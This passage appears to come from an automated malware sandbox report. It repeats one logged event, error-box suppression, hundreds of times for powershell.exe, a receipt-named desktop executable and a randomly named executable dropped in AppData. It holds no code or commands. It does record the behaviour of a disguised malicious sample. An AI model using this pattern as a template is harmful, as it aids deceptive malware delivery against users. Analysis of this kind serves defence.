            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
